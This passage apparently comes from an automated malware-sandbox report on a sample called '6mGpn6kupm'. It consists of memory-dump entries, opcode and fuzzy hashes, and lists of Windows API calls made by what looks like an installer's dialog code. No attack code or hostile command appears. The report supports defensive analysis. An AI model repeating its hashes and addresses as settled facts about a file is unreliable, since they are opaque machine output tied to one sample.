                                                                                                              • Instruction Fuzzy Hash: D7C19074E00218CFEB14DFA9C994B9DBBB2BF89300F5080A9D819AB355DB355E86CF10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2571825445.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_37a80000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 482649c5c01ba030efff743aa91c7dd47567931c5686925e763412152711c698
                                                                                                              • Instruction ID: ab870ca8ea7048cf0f2a8f116e22f7c2cffe0fa7fe08d1f4b934b377e06b09f4
                                                                                                              • Opcode Fuzzy Hash: 482649c5c01ba030efff743aa91c7dd47567931c5686925e763412152711c698
                                                                                                              • Instruction Fuzzy Hash: DDC18074E00258CFEB14DFA9C994B9DBBB2BF89300F6081A9D819AB355DB355A85CF10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2571825445.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_37a80000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a718729cf1446ac27b093e042e2510ec21eb9993f05997e12aac539079da721e
                                                                                                              • Instruction ID: 1b88fb5d84d51713fb4bfc963bf6c70360b8f607ea5be8f1d6e99d1e7df05009
                                                                                                              • Opcode Fuzzy Hash: a718729cf1446ac27b093e042e2510ec21eb9993f05997e12aac539079da721e
                                                                                                              • Instruction Fuzzy Hash: A2C19F74E00218CFEB14DFA9C994B9DBBB2BF89300F5081A9D819AB355DB355E86CF10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2571825445.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_37a80000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2cb4a0fef177bcea69bcc394188badb10fba5c8adf5e84dc3c4508716781447e
                                                                                                              • Instruction ID: dbbac7c1294374a5940bcf80a94af3b7bfc861580fa3d43c4692e2bcbf998584
                                                                                                              • Opcode Fuzzy Hash: 2cb4a0fef177bcea69bcc394188badb10fba5c8adf5e84dc3c4508716781447e
                                                                                                              • Instruction Fuzzy Hash: 71C19274E01218CFEB54DFA9C994BADBBB2BF89300F5080A9D819AB355DB355E85CF10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2571825445.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_37a80000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4927303f1becc8417c2d98feef809b74f67151a4c545892985a5b157147b05cc
                                                                                                              • Instruction ID: 94dd18bf69ed33a518c8d5603f408c59b431a34ba95c06d4edb3859391dc8952
                                                                                                              • Opcode Fuzzy Hash: 4927303f1becc8417c2d98feef809b74f67151a4c545892985a5b157147b05cc
                                                                                                              • Instruction Fuzzy Hash: B8C18274E00218CFEB14DFA5C994BADBBB2BF89300F5081A9D819AB395DB355E85CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2571825445.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_37a80000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 56b0c1e0d92378c108429b2ac3894d24d630f4231229fda3a29572cfac4bfa69
                                                                                                              • Instruction ID: c30564ae294c30c81c0c27392dd7a1d4ea2793526b8045ece588fd82d2bf48a5
                                                                                                              • Opcode Fuzzy Hash: 56b0c1e0d92378c108429b2ac3894d24d630f4231229fda3a29572cfac4bfa69
                                                                                                              • Instruction Fuzzy Hash: CDC19074E00218CFEB14DFA9C994B9DBBB2BF89300F5081A9D819AB355DB355E86CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2571825445.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_37a80000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4bc1e560cbe4d39cbe5925d68bd8f208d8ac4792a528641d173e0de7978e229a
                                                                                                              • Instruction ID: 916944b4e9db34fac774118b6b9bff48b3aadd858e61e0420336fce9301eed5c
                                                                                                              • Opcode Fuzzy Hash: 4bc1e560cbe4d39cbe5925d68bd8f208d8ac4792a528641d173e0de7978e229a
                                                                                                              • Instruction Fuzzy Hash: EDC1A174E00218CFEB14DFA9C994B9DBBB2BF89300F5081A9D819AB355DB355E85CF10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2567719037.0000000034CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 34CA0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_34ca0000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2ae21dc984e6dd2c7f3e1ef523ef99c7817c475ab3cc286b27723029733d6f9e
                                                                                                              • Instruction ID: 3cb41d69f07030cd85897504b3166098112620e621c7f01bc3d7564b17670c58
                                                                                                              • Opcode Fuzzy Hash: 2ae21dc984e6dd2c7f3e1ef523ef99c7817c475ab3cc286b27723029733d6f9e
                                                                                                              • Instruction Fuzzy Hash: CDC18F74E00218CFEB14DFA9C994BADBBB2BF89300F5081A9D419AB355DB355E86CF14
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2567719037.0000000034CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 34CA0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_34ca0000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 405fcadc11d72d0ff07b47b9e1989c3ba567ec83d87ba689ef738f31a0ef6a21
                                                                                                              • Instruction ID: ecef4eb810daf858704d4b81f6f2183a1f197fbb4e9d4aa22fa28e2c10bd382c
                                                                                                              • Opcode Fuzzy Hash: 405fcadc11d72d0ff07b47b9e1989c3ba567ec83d87ba689ef738f31a0ef6a21
                                                                                                              • Instruction Fuzzy Hash: 92C18F74E10218CFEB54DFA9C994B9DBBB2BF89300F6081A9D409BB355DB355A86CF10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2567719037.0000000034CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 34CA0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_34ca0000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6d7adee568b73e94d44de44a1bb4f81cd5274617f31a03834c3a82f8cbc603bb
                                                                                                              • Instruction ID: 832a537835ad52076b0245993b8355d552478449ad0c44ed3e47c4e349e9743d
                                                                                                              • Opcode Fuzzy Hash: 6d7adee568b73e94d44de44a1bb4f81cd5274617f31a03834c3a82f8cbc603bb
                                                                                                              • Instruction Fuzzy Hash: F4C18F74E10218CFEB14DFA9D994B9DBBB2BF89300F5081A9D409BB365DB355A86CF10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2571825445.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_37a80000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: dc9ee2909f23e18c10eb983050fe5c040e43170b3fd414ac67105462f79fec8c
                                                                                                              • Instruction ID: c1c2353ff4d8679f777619a3b14e0ff9156ee8151eb1cde01795b1cfc035f94b
                                                                                                              • Opcode Fuzzy Hash: dc9ee2909f23e18c10eb983050fe5c040e43170b3fd414ac67105462f79fec8c
                                                                                                              • Instruction Fuzzy Hash: 56A17E74A01228DFDB64DF64C894B9ABBB2BF8A301F5085E9D80DA7350DB319E81CF51
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2571825445.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_37a80000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 14e693c5ae95c6fcf1abbe19ac03cfd1c3a795b345ffea6385e5891035c642e9
                                                                                                              • Instruction ID: 549b701337693740bff9e5954acd6d99eca6f1892e0d62ceb17d659767211094
                                                                                                              • Opcode Fuzzy Hash: 14e693c5ae95c6fcf1abbe19ac03cfd1c3a795b345ffea6385e5891035c642e9
                                                                                                              • Instruction Fuzzy Hash: 33517F74A01228DFDB69DF24C854B9ABBB2FB4A301F5095E9D80AA7350DB319E81CF54
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2571825445.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_37a80000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0201a1a4fcf0d9446a2abdc446d7cf3cf32f3fd96c23eb372c0566f10ef47305
                                                                                                              • Instruction ID: c2cb110c9b612ac0b878c17fe421247d1d0d985a04f63bc69421ef408c04c372
                                                                                                              • Opcode Fuzzy Hash: 0201a1a4fcf0d9446a2abdc446d7cf3cf32f3fd96c23eb372c0566f10ef47305
                                                                                                              • Instruction Fuzzy Hash: 19D06C74D4422DDAEB61DFA498403ECB7B1AB9A300F0024A68498A7200DBB19E948A56
                                                                                                              APIs
                                                                                                              • GetDlgItem.USER32(?,00000403), ref: 004055ED
                                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 004055FC
                                                                                                              • GetClientRect.USER32(?,?), ref: 00405639
                                                                                                              • GetSystemMetrics.USER32(00000002), ref: 00405640
                                                                                                              • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405661
                                                                                                              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405672
                                                                                                              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405685
                                                                                                              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405693
                                                                                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 004056A6
                                                                                                              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004056C8
                                                                                                              • ShowWindow.USER32(?,00000008), ref: 004056DC
                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004056FD
                                                                                                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040570D
                                                                                                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405726
                                                                                                              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405732
                                                                                                              • GetDlgItem.USER32(?,000003F8), ref: 0040560B
                                                                                                                • Part of subcall function 00404394: SendMessageW.USER32(00000028,?,00000001,004041BF), ref: 004043A2
                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 0040574F
                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00005523,00000000), ref: 0040575D
                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00405764
                                                                                                              • ShowWindow.USER32(00000000), ref: 00405788
                                                                                                              • ShowWindow.USER32(?,00000008), ref: 0040578D
                                                                                                              • ShowWindow.USER32(00000008), ref: 004057D7
                                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040580B
                                                                                                              • CreatePopupMenu.USER32 ref: 0040581C
                                                                                                              • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405830
                                                                                                              • GetWindowRect.USER32(?,?), ref: 00405850
                                                                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405869
                                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058A1
                                                                                                              • OpenClipboard.USER32(00000000), ref: 004058B1
                                                                                                              • EmptyClipboard.USER32 ref: 004058B7
                                                                                                              • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004058C3
                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 004058CD
                                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058E1
                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00405901
                                                                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 0040590C
                                                                                                              • CloseClipboard.USER32 ref: 00405912
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2537992846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000005.00000002.2537953721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538055109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538148806.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538203550.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                              • String ID: (7B${
                                                                                                              • API String ID: 590372296-525222780
                                                                                                              • Opcode ID: f04ab8e6c053f28f703b7489d19dc379b83f29f3476edfbeb8782164aeb73afa
                                                                                                              • Instruction ID: ef9837d71be30d97cad1ad5ee6bf48d4101bac37d77d0ad6e239d9f51a57dc01
                                                                                                              • Opcode Fuzzy Hash: f04ab8e6c053f28f703b7489d19dc379b83f29f3476edfbeb8782164aeb73afa
                                                                                                              • Instruction Fuzzy Hash: C4B16A70900608FFDB11AFA0DD85AAE7B79FB48355F00403AFA45B61A0CB754E52DF68
                                                                                                              APIs
                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403EC2
                                                                                                              • ShowWindow.USER32(?), ref: 00403EDF
                                                                                                              • DestroyWindow.USER32 ref: 00403EF3
                                                                                                              • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403F0F
                                                                                                              • GetDlgItem.USER32(?,?), ref: 00403F30
                                                                                                              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F44
                                                                                                              • IsWindowEnabled.USER32(00000000), ref: 00403F4B
                                                                                                              • GetDlgItem.USER32(?,00000001), ref: 00403FF9
                                                                                                              • GetDlgItem.USER32(?,00000002), ref: 00404003
                                                                                                              • SetClassLongW.USER32(?,000000F2,?), ref: 0040401D
                                                                                                              • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040406E
                                                                                                              • GetDlgItem.USER32(?,00000003), ref: 00404114
                                                                                                              • ShowWindow.USER32(00000000,?), ref: 00404135
                                                                                                              • EnableWindow.USER32(?,?), ref: 00404147
                                                                                                              • EnableWindow.USER32(?,?), ref: 00404162
                                                                                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404178
                                                                                                              • EnableMenuItem.USER32(00000000), ref: 0040417F
                                                                                                              • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404197
                                                                                                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004041AA
                                                                                                              • lstrlenW.KERNEL32(00423728,?,00423728,00000000), ref: 004041D4
                                                                                                              • SetWindowTextW.USER32(?,00423728), ref: 004041E8
                                                                                                              • ShowWindow.USER32(?,0000000A), ref: 0040431C
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2537992846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000005.00000002.2537953721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538055109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538148806.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538203550.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                              • String ID: (7B
                                                                                                              • API String ID: 184305955-3251261122
                                                                                                              • Opcode ID: 030bf1c90a5d59ce14a62ff8eb631d2412c8a49503263f6ef8a14511ced3c4f7
                                                                                                              • Instruction ID: 1e1a27d6975204c591228116fe5edee23a209105d2649c04e919f1d7e5095d09
                                                                                                              • Opcode Fuzzy Hash: 030bf1c90a5d59ce14a62ff8eb631d2412c8a49503263f6ef8a14511ced3c4f7
                                                                                                              • Instruction Fuzzy Hash: 6FC1A2B1644200FBDB216F61EE85D2A3BB8EB94706F40053EFA41B11F1CB7958529B6D
                                                                                                              APIs
                                                                                                                • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                                • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                              • lstrcatW.KERNEL32(00437000,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,00437800,774D3420,00435000,00000000), ref: 00403B59
                                                                                                              • lstrlenW.KERNEL32(004281E0,?,?,?,004281E0,00000000,00435800,00437000,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,00437800), ref: 00403BD9
                                                                                                              • lstrcmpiW.KERNEL32(004281D8,.exe,004281E0,?,?,?,004281E0,00000000,00435800,00437000,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403BEC
                                                                                                              • GetFileAttributesW.KERNEL32(004281E0), ref: 00403BF7
                                                                                                              • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00435800), ref: 00403C40
                                                                                                                • Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C
                                                                                                              • RegisterClassW.USER32(004291E0), ref: 00403C7D
                                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C95
                                                                                                              • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CCA
                                                                                                              • ShowWindow.USER32(00000005,00000000), ref: 00403D00
                                                                                                              • GetClassInfoW.USER32(00000000,RichEdit20W,004291E0), ref: 00403D2C
                                                                                                              • GetClassInfoW.USER32(00000000,RichEdit,004291E0), ref: 00403D39
                                                                                                              • RegisterClassW.USER32(004291E0), ref: 00403D42
                                                                                                              • DialogBoxParamW.USER32(?,00000000,00403E86,00000000), ref: 00403D61
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2537992846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000005.00000002.2537953721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538055109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538148806.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538203550.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                              • String ID: (7B$.DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                              • API String ID: 1975747703-1425696872
                                                                                                              • Opcode ID: fa642e9f5f159fa40c6df89367760cd7b58c30057714375835671963a1e6ccc9
                                                                                                              • Instruction ID: f49b718e50d7a26840138b6048ee10d29e8519d5aa43f5d66e73d4226ad9b376
                                                                                                              • Opcode Fuzzy Hash: fa642e9f5f159fa40c6df89367760cd7b58c30057714375835671963a1e6ccc9
                                                                                                              • Instruction Fuzzy Hash: FF61C470204700BBE220AF669E45F2B3A7CEB84B49F40447FF945B22E2DB7D5912C62D
                                                                                                              APIs
                                                                                                              • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004045BC
                                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 004045D0
                                                                                                              • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004045ED
                                                                                                              • GetSysColor.USER32(?), ref: 004045FE
                                                                                                              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040460C
                                                                                                              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040461A
                                                                                                              • lstrlenW.KERNEL32(?), ref: 0040461F
                                                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040462C
                                                                                                              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404641
                                                                                                              • GetDlgItem.USER32(?,0000040A), ref: 0040469A
                                                                                                              • SendMessageW.USER32(00000000), ref: 004046A1
                                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 004046CC
                                                                                                              • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040470F
                                                                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 0040471D
                                                                                                              • SetCursor.USER32(00000000), ref: 00404720
                                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00404739
                                                                                                              • SetCursor.USER32(00000000), ref: 0040473C
                                                                                                              • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040476B
                                                                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040477D
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2537992846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000005.00000002.2537953721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538055109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538148806.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538203550.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                              • String ID: N
                                                                                                              • API String ID: 3103080414-1130791706
                                                                                                              • Opcode ID: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
                                                                                                              • Instruction ID: 26ae409e5f73424340e4bb55f347a499eb46e427c8d4328441e026d38e95c6c2
                                                                                                              • Opcode Fuzzy Hash: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
                                                                                                              • Instruction Fuzzy Hash: 4B6173B1900209BFDB109F60DD85EAA7B69FB84314F00853AFB05772E0D7789D52CB58
                                                                                                              APIs
                                                                                                              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                              • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                              • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                              • DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                              • DeleteObject.GDI32(?), ref: 00401165
                                                                                                              • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2537992846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000005.00000002.2537953721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538055109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538148806.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000005.00000002.2538203550.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                              • String ID: F
                                                                                                              • API String ID: 941294808-1304234792
                                                                                                              • Opcode ID: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                                                                              • Instruction ID: b35030fe9107d9a8359b932f7918d2348922827c9ca57aaae851fe5b21190c6b
                                                                                                              • Opcode Fuzzy Hash: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                                                                              • Instruction Fuzzy Hash: 92418A71800249AFCF058FA5DE459AFBBB9FF44310F00842AF991AA1A0C738E955DFA4
                                                                                                              APIs
                                                                                                              • GetDlgItem.USER32(?,000003FB), ref: 0040489F
                                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 004048C9
                                                                                                              • SHBrowseForFolderW.SHELL32(?), ref: 0040497A
                                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 00404985
                                                                                                              • lstrcmpiW.KERNEL32(004281E0,00423728,00000000,?,?), ref: 004049B7
                                                                                                              • lstrcatW.KERNEL32(?,004281E0), ref: 004049C3
                                                                                                              • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004049D5
                                                                                                                • Part of subcall function 00405A32: GetDlgItemTextW.USER32(?,?,00000400,00404A0C), ref: 00405A45
                                                                                                                • Part of subcall function 0040667C: CharNextW.USER32(?,*?|<>/":,00000000,00000000,00437800,00437800,00435000,00403480,00437800,774D3420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
                                                                                                                • Part of subcall function 0040667C: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
                                                                                                                • Part of subcall function 0040667C: CharNextW.USER32(?,00000000,00437800,00437800,00435000,00403480,00437800,774D3420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
                                                                                                                • Part of subcall function 0040667C: CharPrevW.USER32(?,?,00437800,00437800,00435000,00403480,00437800,774D3420,004036EF,?,00000006,00000008,0000000A), ref: 00406706
                                                                                                              • GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,?,00000001,004216F8,?,?,000003FB,?), ref: 00404A98
                                                                                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404AB3
                                                                                                                • Part of subcall function 00404C0C: lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                                                                                • Part of subcall function 00404C0C: wsprintfW.USER32 ref: 00404CB6
                                                                                                                • Part of subcall function 00404C0C: SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9
                                                                                                              Strings
                                                                                                              Memory Dump Source
